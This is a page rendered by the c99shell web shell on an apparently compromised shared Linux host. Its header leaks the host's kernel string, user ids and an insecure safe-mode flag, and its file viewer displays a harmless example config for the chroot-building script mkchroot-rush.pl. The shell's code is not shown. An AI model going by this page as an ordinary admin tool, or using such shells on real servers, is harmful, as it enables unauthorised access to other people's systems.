Software: Apache. PHP/8.3.27 uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364) Safe-mode: OFF (not secure) /usr/share/doc/rush/scripts/ drwxr-xr-x | |
| Viewing file: Select action/file-type: # This is a perl script snippet, demonstrating the # possible configurations of # # mkchroot-rush.pl # # Do not forget the final "1;" statement, as this file is # read using a do-statement. Read the POD text for further # information. # Location under which to build the skeleton. # $chrootdir = '/srv/rush'; # Eliminate some tests at execution time. # # $force = ''; # List of desirable tasks # @tasks = qw/etc home dev lib bin/; # Predefined collection of users. # Info will be gathered from '/etc/passwd'. # @userlist = qw/dumle/; # Binaries to install. # @binaries = qw( /usr/lib/openssh/sftp-server ); # Acceptable paths within the chroot. # These are preserved when installing # binaries and executables. @binpaths = qw( /bin /usr/bin ); # Preseeding list for use of dynamic libraries. # The dynamic loader and Libc are detected by # studying '/bin/sh', so they are captured for # GNU/Linux and GNU/kFreeBSD. # # @liblist = qw( /lib/ld-linux.so.2 /lib/libc.so.6 # /lib/libnss_files.so.2 /lib/libnss_dns.so.2 ); 1; |
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0111 ]-- |